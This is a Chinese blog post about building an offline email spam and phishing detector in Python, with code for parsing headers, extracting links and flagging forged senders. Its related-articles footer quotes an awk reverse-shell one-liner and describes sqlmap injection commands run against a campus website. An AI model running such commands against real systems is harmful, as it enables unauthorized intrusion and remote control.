用Python制作邮件检测器

已于 2023-08-31 11:16:48 修改
阅读量843 收藏 2
点赞数
分类专栏: 信息安全 python 文章标签: python 开发语言
于 2023-02-27 16:54:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43199509/article/details/129244264
版权

因为需求需要写一个简单的邮件检测系统的框架,这里记录下思路
首先第一反应,这个检测系统不应该是各个邮件收件系统都有自带的吗,于是搜索了下是否有相关的邮件检测开源软件,发现有两个比较靠谱的:
1.spamassassin
https://spamassassin.apache.org/

2.mmpi
https://github.com/a232319779/mmpi

3.其他一大堆使用机器学习的nlp方法,论文保存在git的misc文件下了

发现实际mmpi比较符合我的需求,但是看了下感觉规则有点少了而且是几年前的,
spamassassin规则很丰富,而且一直在更新,但是也有问题:它的规则很大一部分是根据英文关键词和域名设计的,如果是中文的话需要再做适配,还有就是他的很多规则需要联网或者自定义黑白名单,我的想法是尽量做一个离线也能使用的脚本框架,于是借鉴
spamassassin的方式,把它的正则表达式规则移植过来。它的中心思想是,如果邮件命中了规则的话就给邮件加上对应的报警分数,当分数达到一定阈值的时候就报警。

我是尝试使用了python自带的email包来读取邮件,然后把各个字段以字典的形式保存下来,到时候对应的检测的时候直接检测对应字段即可

import email.header
import os
from email.parser import Parser
import json
import re
from OSutils import loadJson


class MailReader(object):
    """
    用于读取eml文件,并把各个字段保存下来
    使用python3.7内置的email包
    """

    def __init__(self, eml_path="", debug=False):
        """
        初始化属性
        """
        self.raw_email = None
        self.email_content = None
        self.process_log = ""
        self.debug = debug
        self.attribute_dict = {}
        self.mail_text = ""
        self.all_links = []
        self.urls = []
        self.tag = set()
        self.flag = set()
        if eml_path:
            self.__MailReader(eml_path)

    @staticmethod
    def decodeHeader(header_str):
        """
        输入需要解码的header字符串,返回解码结果
        """
        temp = email.header.decode_header(header_str)
        result = email.header.make_header(temp)
        return result

    def addTag(self, tag):
        """
        给邮件添加标签,以字符串的形式存放在列表中
        """
        self.tag.add(tag)
        return self.tag

    def addFlag(self, flag):
        """
        给邮件添加自定义的检测标记
        tag用于输出,flag用于规则检测
        """
        self.flag.add(flag)
        return self.flag

    def toString(self):
        """
        打印整个邮件以及日志
        """
        print("email内容:", self.email_content)
        if self.debug:
            print("process_log:", self.process_log)
        return self.email_content

    def toDict(self):
        """
        把header转换为字典形式,From,To,Subject需要单独解码
        字典的键统一小写
        """
        each_key: str
        all_str = []
        if self.attribute_dict != {}:
            return self.attribute_dict

        for each_key in set(self.email_content.keys()):
            self.attribute_dict.update({each_key.lower(): self.email_content.get_all(each_key)})
            all_str += self.email_content.get_all(each_key)

        for each_key in ["From", "To", "Subject"]:
            temp = []
            if each_key not in self.attribute_dict:
                continue
            for each_str in self.attribute_dict.get(each_key):
                each_str = str(self.decodeHeader(each_str))
                temp.append(each_str)
            self.attribute_dict.update({each_key.lower(): temp})
        self.attribute_dict.update({'body': self.getContent()})
        self.attribute_dict.update({'url': self.getUrls()})
        self.attribute_dict.update({'all': all_str})
        return self.attribute_dict

    def toJson(self):
        """
        把字典转换为json格式
        """
        if self.attribute_dict == {}:
            self.attribute_dict = self.toDict()
        return json.dumps(self.attribute_dict)

    def __MailReader(self, eml_path):
        """
        读取邮件,有些邮件开头会混入无用字符,需要去除才能提取信息
        """
        try:
            if os.path.exists(eml_path):
                with open(eml_path, encoding='utf-8', errors='ignore') as fp:
                    self.raw_email = fp.read()
                cut_len = 0
                for each_line in self.raw_email.split('\n'):
                    if ':' not in each_line:
                        cut_len += len(each_line) + 1
                    else:
                        break
                if cut_len:
                    self.raw_email = self.raw_email[cut_len:]
                self.email_content = Parser().parsestr(self.raw_email)
        except Exception as e:
            self.process_log += "读取邮件失败:" + str(e)
            self.toString()
        return self

    def parseMail(self, eml_path):
        """
        输入邮件路径,用email库整理邮件
        """
        self.attribute_dict = {}
        return self.__MailReader(eml_path)

    def getContent(self):
        """
        循环遍历数据块并尝试解码,暂时只处理text数据
        """
        all_content = []
        for par in self.email_content.walk():

            if not par.is_multipart():  # 这里要判断是否是multipart,是的话,里面的数据是无用的
                str_charset = par.get_content_charset(failobj=None)  # 当前数据块的编码信息
                if str_charset is None:
                    self.addTag("没有获取到部分内容的charset")
                    self.addFlag("NO_CHARSET")
                    continue

                str_content_type = par.get_content_type()
                if str_content_type in ('text/plain', 'text/html'):
                    try:
                        content = par.get_payload(decode=True)
                        all_content.append(content.decode(str_charset))
                    except Exception as e:
                        print(e)
        self.mail_text = all_content
        return all_content

    def getUrls(self):
        """
        获取所有的url链接,与getLinks不一样的是,getUrls的返回值是一个字符串列表
        """
        if self.urls:
            return self.urls
        self.getLinks()
        return self.urls

    def getLinks(self):
        """
        通过正则表达式,匹配超链接以及
        显示的属性内容,格式如下
         [('https://rashangharper.com/wp-admin/user/welllz/display/login.html', 'wellsfargo.com')]
        """
        if self.all_links:
            return self.all_links
        all_links = []
        self.urls = []

        if self.mail_text == "":
            self.getContent()

        pattern = '<a.*?href="(.+)".*?>(.*?)</a>'
        for part in self.mail_text:
            links = re.findall(pattern, part, re.IGNORECASE)
            all_links += links

        self.all_links = all_links
        for each_link in all_links:
            self.urls += list(each_link)
        return all_links


if __name__ == '__main__':
    a = MailReader("fakeherf.eml").toDict().get('date')[0]

然后是规则设计部分,也是参考spamassassin的规则, 分为简单规则和复杂规则,简单规则,直接用正则表达式检查邮件对应的部分即可
在这里插入图片描述
复杂规则的话,我是写成了python类的形式,然后在运行的时候动态加载,放在metarules文件夹里,类似于下面这样的:

class CheckMail(object):
    """
    检查邮件中,From是否和存在的真实发件源不一样
    """

    def __init__(self, input_mail):
        self.reader = input_mail
        self.score = 2.5
        self.description = "检查邮件中,From和存在的真实发件源不一样"

    @staticmethod
    def list2str(data_list):
        """
        把字符串列表转换成字符串
        """
        if isinstance(data_list, list):
            result = ""
            for each_str in data_list:
                result += each_str + " "
            return result[:-1]
        return data_list

    def getReport(self):
        """
        检测邮件的From字段,option_sender中是几种可能的
        真实发件人字段
        """

        header_dict = self.reader.toDict()
        if header_dict.get('from'):
            mail_from = self.list2str(header_dict.get('from'))
        else:
            self.reader.addTag("发件人缺失")
            return True, [self.score, "未检测到发件人字段"]

        for option_sender in ["x-mail-from", "return-path", "x-qq-orgsender", "sender"]:
            if option_sender in header_dict:
                for each_option_sender in header_dict.get(option_sender):
                    if each_option_sender not in mail_from:
                        self.reader.addTag("疑似伪造的发件人")
                        return True, [self.score, self.description]
        return False, []

其他内容及readme详见github
github地址:
https://github.com/CaLlMeErIC/MailDetective

梦想闹钟
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初学者垃圾邮件检测
weixin_26704853的博客
08-19 373
This is a small project in python using machine learning to detect whether a given text is spam or ham(not spam). I made this project after completing the course of “Applied Text Mining in Python” by ...
Spam_SMS_Detector:此Web应用程序是Python中的垃圾邮件检测模型,可自动将邮件(SMS)分类为垃圾邮件或火腿(合法邮件
05-22
•此Web应用程序是Python中的垃圾邮件检测模型,可自动将邮件(SMS)分类为垃圾邮件或ham(合法邮件) 。 •它是用Flask创建的,并部署在Heroku平台上。 •要查看已部署的项目,请访问以下链接。 链接: : •...
python垃圾邮件识别_垃圾邮件过滤器 python简单实现
weixin_39690958的博客
12-03 1386
前一段时间用Python写了一个简单的垃圾邮件过滤器,感觉还蛮有意思的,顺便学习一点Python今天做了一点改进,刚刚升级到1.2版本。项目地址在mailFilter http://github.com/lvwangbeta/mailFilter.git。我想趁2012年还没结束,而且也快考试啦,发篇博文简单介绍一下,主要用到的知识还是 listdic 这些最基本的数据结构,再加上一点儿概率统计。...
探秘高效邮件测试工具:MailHog
最新发布
gitblog_00050的博客
05-10 433
探秘高效邮件测试工具:MailHog 项目地址:https://gitcode.com/mailhog/MailHog 1、项目介绍 MailHog,一个轻量级的邮件测试工具,专为开发者设计,让你在开发环境中方便地捕获和查看发出的电子邮件。受到MailCatcher的启发,MailHog以其简单安装和易用性脱颖而出。通过配置你的应用以使用MailHog作为SMTP服务器,你可以直接在Web界面中查...
python写的翻译器
qq_29061315的博客
12-23 8492
一、灵感来源 1、最近在学习python爬虫,发现现在的百度翻译限制爬虫了,在网上找到了一些文档,说现在都限制反爬,让我一顿失望,爬虫的时候会报:{"errno":997,"errmsg":"\u672a\u77e5\u9519\u8bef","query":"he","from":"en","to":"zh","error":997}的错误;但是还是让我找到了解决方案,有位博主用5行代码写出了对应调用对应接口的程序,我是特别膜拜,就大树底下好乘凉,你懂得,借鉴借鉴。这边奉上对应博主文章链接,有兴趣的伙伴
制作一个简单的邮件收发脚本Python
Mr__NEO的博客
07-25 1754
邮件收发简易系统 预备工作 采取了Python3的编程语言,因为邮件收发一般需要搭建服务器较为麻烦,因此采取了用第三方服务器的替代方案,这里用QQ邮箱自提供的功能POP3/SMTP来实现,因此需要进入自己的QQ邮箱账号进行开通 从而获取自己的授权代码并可通过第三方服务器进行对邮件的各种处理,甚至是群发等功能。 SMTP 首先针对SMTP主要是信件的发送协议,基于TCP/IP协议族实现。这里因为Python有现成的SMTP库封装成了几个函数形式的功能故可以直接实现。在我的程序顶部的注释部分是一个关于SMTP类
Python 基础(一):入门必备知识
热门推荐
Python小二
10-30 111万+
Python 入门必备知识,你都掌握了吗?
使用Python制作进度条有多少种方法?看这一篇文章就够了!
码银的博客
02-24 4082
偶然间刷到一个视频,说到:当程序正在运算时,会有一个较长时间的空白期,谁也不知道程序运行的进度如何,不如给他加个进度条。于是我今个就搜寻一下,Python版的进度条都可以怎么写!
SMSSMS垃圾邮件检测器的专业攻击
weixin_26746401的博客
08-21 536
Note: The methodology behind the approach discussed in this post stems from a collaborative publication between myself and Irene Anthi. 注意: 本文讨论的方法背后的方法来自 我本人和 Irene Anthi 之间 的 合作出版物 。 介绍 (INTRODUCT...
Python实用工具之制作证件照(有界面、附源码、赞关藏)
向日葵的专属太阳
09-09 1万+
removebg配置 安装对应的 Python 库 pip install -i https://pypi.douban.com/simple removebg 获取API Key 进入 Removebg 官网,完成账号注册。 填写完注册信息后,会发送验证邮件到你的邮箱,点击进入后会进入如下界面。 点击 Remove image background 再点击红圈中的 Tool & API ...
python做硬件自动化测试仪器_利用Python语言实现实验室自动化
weixin_39724469的博客
11-24 621
用的库,很容易实现以上目的。此外,Python脚本非常容易修改。如果您随后确定通过两个自变量来采集信号而不是一个自变量,那么需要做的仅仅是将之前设计的循环嵌套到另一个循环之内。可能只需几行新代码即可解决这一问题。得益于Python的高度可读性,您很容易修改其他人编写的脚本(对于LabVIEW应用程序,我往往很害怕这么做)。随着复杂度的增加,编程语言具有图形语言无可比拟的优势。Python在数学运算...
Sunfounder_BaseKit_Python_Code_for_RaspberryPi:适用于 Raspberry Pi 的 Sun Founder Base Kit Python 代码
06-15
例如,使用按钮,可以实现一个简单的开关应用,当按下按钮时,Python程序检测到变化并执行相应操作,如点亮LED。 4. **传感器数据采集**: 套件中的传感器,如温度传感器、光线传感器,可以用来获取环境信息。...
python_for_android中文api.pdf
12-20
AndroidFacade: 提供了对Android基础系统的访问,包括获取剪贴板内容、输入、意图、包版本信息、密码,日志记录、制作吐司通知、检查所需版本、发送邮件、设置剪贴板、启动活动、启动带有结果的活动以及振动设备等...
黑帽python编程数据
10-05
1. **自定义工具开发**:本书教授读者如何根据自己的需求定制开发网络安全工具,如自定义扫描器、漏洞检测工具等。 2. **API与框架集成**:讲解了如何将Python与现有的安全框架或API集成,提高工具的功能性和效率。 ...
playing_smplifyx:使用存储库SMPLify-X中的代码
05-03
展示了SMPLify-X优化器的工作方式,将人体模型的制作效果呈现在已处理图像的顶部。 安装 要安装,请首先按照SMPLify-X安装说明进行操作。 您必须从项目网站下载使用的人体模型,注册并接受其使用许可的条款。 确认...
反弹shell失败 原来是这个原因
梦想闹钟
08-31 6403
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell 提示没有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是没有解决问题,最后在谷歌上找到了解释 https://evilpan.com/2021/04/25/reverse-shell/ 因此还是使用awk命令一句话反弹shell awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell
记一次校园网渗透经历
梦想闹钟
08-13 2984
首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站 网址http://***/index.php/index/notice/id/1 点进去是一个上网须知 怀疑id/1中 1为注入点,上sqlmap!! sqlmap -u “http://**/index.php/index/notice/id/” --level 3 跑出来发现是一个注入点 然后接下来 --dbs 得到库名后用-D radius --tables看下表,这时候已经
tensorflow 拼接不同的神经网络结构
梦想闹钟
09-23 1987
最近尝试了将两个网络组合,下面的代码是将cnn和mlp网络进行组合的示例,输入CNN网络的特征维度是n40000,将其转化为n(200200)的维度输入到cnn网络中,卷积过后再和维度为n2500的特征结合,输入到mlp网络里去,最终输出是对应10分类的概率,关键是使用 layers.concatenate将不同网络的输出拼接起来,作为新网络的输入。同时,使用多个网络和多个输入时也需要提前声明多个Input层,以及model里的输入格式models.Model(inputs=[input1, input2]
使用python制作忆阻器相关内容
12-10
忆阻器是一种电子元件,它的电阻值取决于通过它的电流的变化历史。要使用Python制作忆阻器,首先需要了解忆阻器的工作原理和电路设计。然后,可以使用Python来模拟忆阻器的行为并进行实时数据分析。 在Python中,可以使用NumPy和SciPy等库来进行数学计算和数据分析。可以利用这些工具来模拟忆阻器的电流变化,并通过实验数据来验证模拟结果。 另外,可以利用Python的可视化库,比如Matplotlib和Seaborn,来绘制忆阻器的电流变化曲线图和数据分布图。这样可以更直观地看到忆阻器的特性和行为。 除了模拟和数据分析,也可以使用Python来控制硬件实现对忆阻器的实时监测和控制。通过连接Arduino或Raspberry Pi等硬件,并编写Python程序来读取和控制忆阻器的电流,实现对忆阻器的实时操作和监测。 总之,使用Python制作忆阻器涉及到电路设计、数学模拟、数据分析和硬件控制等多个方面,需要综合运用Python语言及相关库来完成。这将是一个综合能力和技术水平的挑战,但也将为忆阻器的研究和应用提供便利和可能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值